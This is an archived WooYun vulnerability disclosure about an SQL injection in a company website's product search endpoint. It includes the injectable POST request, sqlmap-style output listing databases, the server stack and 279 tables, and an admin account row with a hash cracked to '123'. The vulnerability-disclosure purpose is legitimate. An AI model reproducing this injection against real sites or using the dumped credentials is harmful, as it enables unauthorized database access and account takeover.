乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
没找到登入地址
搜索处存在post参数注入:
post包:
POST /site/keyword_search/Search-product_c/index.php?Company_SN=21779&PHPSESSID=o08t64euchcjt83i8u3go40td5 HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/site/left/asn_left_8jimmy86/index.php?Company_SN=21779&PHPSESSID=oshynibfulnshuccmzydjfnfubjjxqrl&&target=MainPageCookie: PHPSESSID=o08t64euchcjt83i8u3go40td5Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 29Company_SN=21779&KeyWord=1%27
available databases [4]:[*] information_schema[*] muchcalm[*] twinner[*] twinner_dev
[21:24:40] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 5web application technology: Apache 2.2.3, PHP 5.3.16back-end DBMS: MySQL 5.0[21:24:40] [INFO] fetching current user[21:24:40] [INFO] resumed: twinner@localhostcurrent user: 'twinner@localhost'
[279 tables]+------------------------------------------+| About_US || Ad_Classify || Agency_Detail || Agency_Title || AppProduct || App_Classify || App_Relation || Associate || Associate_Member || Associate_Member_Relation || Associate_Type || Attend_Member || Authority_Company_Site_Function || Authority_FAQ_Classify_Function || Authority_Group || Authority_Group_Company_Relation || Authority_Menu_Collection || Authority_Menu_Function || Authority_Menu_Subsystem || Authority_Product_Site_Classify_Function || CRM_Manager || Car_Member || Carriage_Charge || Carriage_Type || Charset || City || Classify_MoreSpec || Code_Data || Code_Temp || Code_Type || Company || CompanyType || Company_Contact || Company_Member || Company_Member_Relation || Company_Site || Company_Site_Function || Company_Site_Function_copy || Company_Temp || Company_crm_contact || Company_crm_messenger || Company_keyword || Competitor_Products || Competitor_cols || Contact_Us || Customer_Manager || FAQ || FAQ_Classify || FAQ_MoreSpec || Gbook || Gbook_R || Inquiry_List || Inquiry_List2 || Inquiry_List_Temp || Inquiry_Title || Inquiry_Title2 || Language || Letter || Letter_Sender_Title || Letter_Title || Member || Member_Bonus || Menu_Collection || Menu_Function || Menu_Subsystem || MinOrdUnit || Modules || New_Product || Order_Detail || Order_NO || Order_Title || Parameter_Sheet || Product || Product_App_Count || Product_Classify || Product_Classify_0 || Product_Classify_1 || Product_Classify_2 || Product_Classify_3 || Product_Classify_App || Product_Classify_AppRelation || Product_Classify_Keyword || Product_Classify_Pitch || Product_Classify_PitchRel || Product_Detail || Product_Detail_PDF || Product_Feature || Product_Feature_Detail || Product_Feature_Relation || Product_HowOrder_Images || Product_Index || Product_MoreSpec || Product_MoreSpecAV || Product_MoreSpec_Temp || Product_Other_Image || Product_Other_Image_copy || Product_Pitch_Count || Product_Price || Product_Property || Product_Property_C || Product_Property_Temp || Product_Property_hr_preset || Product_Property_hr_title || Product_Safe_Image || Product_Site_Classify || Product_Site_Classify_Images || Product_Site_Classify_MoreSpec || Product_Site_Classify_Rel || Product_Structural_Images || Product_Tabview || Product_Temp || Product_app_Classify || Product_app_Classify_0 || Product_app_Classify_1 || Product_app_Classify_2 || Product_app_Classify_3 || Product_factory_Relation || Property || Rct_Department || Rct_Position || Rct_list || Region || Register || SN_Counter || Safety || Safety_Relation || Sale_Contact || Sale_Master || Sale_Order || Service || Service_Classify || Site_Banner || Site_Function || Site_Home || Site_News || Site_News_classify || Solutions_Classify || Spec_Search || TempProduct || Temp_Storage || Title || Twinner_Manager || Web_Connection || Web_Connection_Classify || Web_Connection_Temp || analytic_mgmt || cad_specify_cable || campaign_product || campaign_supplier || car_field || car_template || car_value || classify1 || classify2 || classify3 || company_classify_keyword || company_member_class || company_messenger || company_new_product || company_note || crm2_sendmail || crm2_sendmail_content || customer_certif || customer_sales || customer_source || customer_sources || customer_staff || end_user_classify || end_user_classify_to_product || factory || factory_img || forsale || gc_female || gc_male || general_inquiry || history_record || inquiries || keyword_search || list_level || mail_model || messenger_protocol || number_manage || oem_odm || order_factory_temp || product_quotation || programs || rotate_swf || s_S1 || s_S10 || s_S11 || s_S12 || s_S13 || s_S14 || s_S15 || s_S2 || s_S3 || s_S4 || s_S5 || s_S6 || s_S7 || s_S8 || s_S9 || s_fieldname || s_fieldvalue || s_product || s_show || s_tablename || select_temp || sp_field || sp_fieldvalue || sp_group || sp_s1 || sp_s10 || sp_s11 || sp_s12 || sp_s13 || sp_s14 || sp_s15 || sp_s16 || sp_s17 || sp_s18 || sp_s19 || sp_s2 || sp_s20 || sp_s21 || sp_s22 || sp_s23 || sp_s24 || sp_s25 || sp_s26 || sp_s27 || sp_s28 || sp_s29 || sp_s3 || sp_s30 || sp_s31 || sp_s32 || sp_s33 || sp_s34 || sp_s35 || sp_s36 || sp_s37 || sp_s38 || sp_s39 || sp_s4 || sp_s40 || sp_s5 || sp_s6 || sp_s7 || sp_s8 || sp_s9 || supplier_category || supplier_member_login || template_record || twinner_right_banner || twinner_right_banner_pc0 || upload || upload_av || verify_list || wke_aboutus || wke_ad || wke_admuser || wke_area || wke_block || wke_child || wke_country || wke_lion || wke_lion_mgn || wke_live || wke_method || wke_news || wke_page || wke_pic || wke_plan || wke_plan_mgn || wke_school || wke_sponsor || wke_talk || wke_video |+------------------------------------------+
[1 entry]+-------+----+----------------------------------------+| adm | id | passwd |+-------+----+----------------------------------------+| admin | 1 | 202cb962ac59075b964b07152d234b70 (123) |+-------+----+----------------------------------------+
危害等级:高
漏洞Rank:15
确认时间:2015-12-21 04:01
感謝通報
暂无
![1]PQ81CJ$]HM])5]{S~DI4P.png](http://wimg.zone.ci/upload/201512/162123284c5cea670b857546b8aeb09e9b4d9a5f.png)
